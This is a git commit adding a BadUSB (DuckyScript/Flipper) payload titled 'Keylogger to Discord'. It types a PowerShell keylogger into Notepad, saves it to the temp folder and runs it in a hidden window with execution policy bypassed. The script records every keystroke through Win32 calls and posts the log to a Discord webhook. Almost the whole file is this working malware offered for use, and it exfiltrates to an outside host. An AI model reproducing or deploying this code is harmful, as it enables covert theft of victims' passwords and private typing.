Add files via upload

2026-01-02 07:50:06 -08:00 · 2023-05-28 11:14:43 +00:00
parent 6d2d430144
commit 538b1bb6da
1 changed files with 484 additions and 0 deletions
--- a/OSINT/Keylogger
+++ b/OSINT/Keylogger
@@ -0,0 +1,484 @@
+REM Title: Keylogger to Discord
+REM Author: @beigeworm
+REM Description: Uses Powershell to gather keystroke info and send it via Discord.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace WEBHOOK_HERE with your discord webhook.
+REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM Open Notepad for script building.
+DELAY 1000
+GUI r
+DELAY 500
+STRING notepad
+ENTER
+DELAY 2500
+STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt"
+ENTER
+STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
+ENTER
+STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @'
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);
+ENTER
+STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+ENTER
+STRING '@
+ENTER
+ENTER
+STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun  -ge $rnnr){
+ENTER
+STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock
+ENTER
+STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder
+ENTER
+STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}
+ENTER
+STRING $getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
+ENTER
+STRING $json = @{"username" = "$env:COMPUTERNAME"
+ENTER
+STRING "content" = $escmsg} | ConvertTo-Json
+ENTER
+STRING Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $json; Start-Sleep 1; $whuri = "."
+ENTER
+STRING Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5)
+ENTER
+DELAY 1000
+
+REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types)
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+ESCAPE
+
+
+DELAY 10000
+REM save in temp directory.
+DELAY 1000
+CTRL-SHIFT s
+DELAY 1500
+STRING %temp%
+ENTER
+STRING txtlog.ps1
+DELAY 500
+TAB
+DOWN
+DOWN
+ENTER
+ENTER
+DELAY 1000
+ALT F4
+
+REM Open Powershell and start logs.
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit
+ENTER
+